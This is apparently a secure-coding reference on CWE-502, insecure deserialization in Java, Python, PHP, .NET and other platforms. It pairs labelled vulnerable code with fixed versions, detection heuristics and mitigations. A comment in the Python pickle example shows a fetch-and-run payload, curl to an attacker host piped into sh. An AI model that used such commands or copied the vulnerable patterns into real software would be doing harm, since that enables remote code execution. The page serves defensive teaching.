CWE-502: Deserialization of Untrusted Data¶
CWE-502 | OWASP Top 10 A08:2021 | CVSS Base Score range: 8.1-9.8 | Rank 16 in CWE Top 25
Functional Semantics¶
Deserialization reconstructs an object graph from a byte stream. The vulnerability arises because the deserializer must instantiate objects and invoke methods (readObject, __wakeup, __destruct, property setters) before application code can inspect the result. Attacker-supplied data controls which classes are instantiated and with what state, enabling traversal of pre-existing "gadget chains" — sequences of legitimate class methods that, when chained, produce arbitrary OS command execution.
The attacker does not inject new code; they compose existing code in unexpected ways. The exploit requires only that a gadget chain exist among the loaded classes (JVM classpath, Python import tree, etc.), not in the application's own code.
Root Cause¶
Deserialization formats that encode type information alongside data allow the deserializer to instantiate arbitrary classes from the runtime's class universe. The security boundary assumed by the application (only expected data types arrive) is absent at the protocol level. Fixes at the data-validation layer are uniformly too late — object construction already occurred.
Trigger Conditions¶
- Deserializer receives data from: HTTP body/cookie, WebSocket frame, message queue, RPC parameter, file upload, database BLOB read from user-writable table, cache layer (Redis/Memcached) populated from user input.
- Serialization format carries type metadata: Java native serialization (
AC ED 00 05), Python pickle (\x80\x04opcodes), PHPO:/a:strings, .NET BinaryFormatter, Ruby Marshal (\x04\x08), YAML with!!tags, AMF, Kryo with default registration. - Gadget chain libraries present in classpath:
commons-collections,spring-core,groovy,xstream,ysoserial-covered libraries.
Affected Ecosystems¶
| Platform | Vulnerable API | Safe Alternative |
|---|---|---|
| Java | ObjectInputStream.readObject() | JSON (Jackson with type restrictions), readResolve allowlisting |
| Python | pickle.loads(), yaml.load(), shelve | json, yaml.safe_load(), ast.literal_eval() |
| PHP | unserialize() | json_decode(), set allowed_classes parameter |
| .NET | BinaryFormatter, NetDataContractSerializer, SoapFormatter | System.Text.Json, DataContractSerializer with DataContractResolver |
| Ruby | Marshal.load() | JSON, MessagePack |
| Node.js | node-serialize (npm), serialize-javascript eval path | Plain JSON |
| XML/YAML | XStream.fromXML(), yaml.load() with !!python/object | Schema-validated parsers, safe loaders |
Vulnerable Patterns¶
Java — ObjectInputStream without allowlist¶
// VULNERABLE: deserializes arbitrary classes from HTTP body
@PostMapping("/api/prefs")
public ResponseEntity<?> loadPrefs(@RequestBody byte[] data) {
try (ObjectInputStream ois = new ObjectInputStream(
new ByteArrayInputStream(data))) {
UserPrefs prefs = (UserPrefs) ois.readObject(); // gadget chain executes here
return ResponseEntity.ok(prefs);
}
}
Python — pickle on untrusted input¶
# VULNERABLE: pickle.loads executes arbitrary opcodes
import pickle, base64
from flask import request
@app.route("/restore")
def restore_session():
data = base64.b64decode(request.cookies.get("session"))
obj = pickle.loads(data) # attacker payload: os.system("curl attacker.com/shell.sh|sh")
return str(obj)
PHP — unserialize without class restriction¶
// VULNERABLE: triggers __wakeup/__destruct on arbitrary classes
$data = base64_decode($_COOKIE['cart']);
$cart = unserialize($data); // POP chain via Symfony/Laravel gadgets
Fixed Patterns¶
Java — ObjectInputStream with class allowlist¶
// FIXED: allowlist via serialization filter (Java 9+)
ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data));
ois.setObjectInputFilter(info -> {
Class<?> cls = info.serialClass();
if (cls == null) return ObjectInputFilter.Status.ALLOWED;
if (cls == UserPrefs.class || cls == String.class) {
return ObjectInputFilter.Status.ALLOWED;
}
return ObjectInputFilter.Status.REJECTED; // block gadget chains
});
UserPrefs prefs = (UserPrefs) ois.readObject();
Python — eliminate pickle, use JSON¶
# FIXED: JSON cannot instantiate arbitrary objects
import json, base64
from flask import request
@app.route("/restore")
def restore_session():
raw = base64.b64decode(request.cookies.get("session"))
data = json.loads(raw) # pure data, no code execution
prefs = UserPrefs(theme=data["theme"], lang=data["lang"])
return str(prefs)
PHP — allowed_classes restriction¶
// FIXED: restricts instantiation to known safe classes
$data = base64_decode($_COOKIE['cart']);
$cart = unserialize($data, ["allowed_classes" => ["CartItem", "ProductRef"]]);
// Returns false if unknown class encountered
if ($cart === false) { /* reject */ }
.NET — replace BinaryFormatter¶
// VULNERABLE
var formatter = new BinaryFormatter();
var obj = formatter.Deserialize(stream); // CS0618 warning in .NET 5+, removed .NET 9
// FIXED: System.Text.Json with strict type handling
var options = new JsonSerializerOptions { PropertyNameCaseInsensitive = true };
var obj = JsonSerializer.Deserialize<UserPrefs>(stream, options);
Detection Heuristics¶
Static analysis triggers: - ObjectInputStream, readObject, readUnshared on non-constant InputStream - pickle.loads, pickle.load where argument is not a file opened by the application - yaml.load( without Loader=yaml.SafeLoader argument - unserialize( in PHP without allowed_classes - BinaryFormatter, SoapFormatter, NetDataContractSerializer usage (all deprecated) - Marshal.load in Ruby on any non-hardcoded input - eval( in node-serialize deserialization path
Data-flow triggers: - Serialized data originates from: request.body, request.cookies, request.headers, query parameter, file upload, message queue read - Magic bytes in controlled data: AC ED 00 05 (Java), \x80\x04 or \x80\x05 (Python pickle v4/v5), O: prefix (PHP), \x04\x08 (Ruby Marshal)
Dependency triggers (gadget chain presence): - Maven/Gradle: commons-collections < 3.2.2, commons-beanutils < 1.9.4, spring-core, groovy-all - npm: node-serialize (any version — fundamentally unsafe) - pip: PyYAML < 6.0 with yaml.load without Loader
False positive indicators: - ObjectInputStream reading from a file that the application itself wrote in the same request lifecycle (no user control over content). - pickle.loads in unit test fixtures loading known-good test data from source-controlled files. - Serialized data protected by HMAC verified before deserialization — reduces but does not eliminate risk if HMAC secret leaks.
Gotchas¶
- HMAC-signed serialized data is not safe. If the signing key is compromised (environment variable, hardcoded, timing side-channel), the attacker can forge valid signatures. Never serialize to formats with type metadata, regardless of signing.
- JSON is not universally safe.
json.loadsin Python is safe;JSON.parsein Node.js is safe. ButJSON.parsefollowed byeval(result.code)ornew Function(result.fn)reintroduces code execution. The vulnerability is in post-deserialization use, not the JSON parser itself. - allowlist bypass via inheritance. A Java ObjectInputFilter allowlisting
CollectionacceptsArrayList,HashMap, and any third-party class implementingCollection. Use final class checks, notisAssignableFrom. - Gadget chains survive class updates. Patching
commons-collectionsremoves known gadgets but new chains are regularly discovered. Allowlisting is a stronger control than dependency updates alone. - .NET DataContractSerializer is conditionally safe. With
DataContractResolverit can instantiate arbitrary types if the resolver is permissive. Default behavior (no resolver, explicit known types only) is safe. - Redis/Memcached as deserialization vector. Applications reading Java-serialized objects from Redis are vulnerable if an attacker can write to the cache key (via SSRF to Redis, or cache poisoning via unvalidated keys).
Exploitation Impact¶
- Direct RCE: gadget chain terminates in
Runtime.exec(),ProcessBuilder,os.system(),eval() - File write: gadget chain writes to filesystem, enabling webshell creation
- SSRF pivot: gadget chain initiates outbound HTTP requests to internal services
- Privilege escalation: deserialization in context of privileged service (e.g., Jenkins master, application server admin)
Mitigation Priority¶
- Eliminate the format — replace binary/type-aware serialization with JSON/protobuf (no type metadata). Highest ROI.
- Allowlist classes — Java serialization filter, PHP
allowed_classes. Necessary when format cannot be changed. - Integrity check before deserialization — HMAC the payload, verify before passing to deserializer.
- Network isolation — if gadget chains require outbound network (DNS callback, reverse shell), block egress from deserializer process.
- Java agent deserialization blockers —
SerialKiller,NotSoSerial,HardenedObjectInputStreamas defense-in-depth.
See Also¶
- CWE-020: Input Validation — upstream control: validate format before deserialization
- CWE-094: Code Injection — overlapping impact: arbitrary code execution
- cwe 918 ssrf — gadget chain often used to trigger internal HTTP requests
- CWE-611: XML External Entities — similar pattern: parser instantiates external resources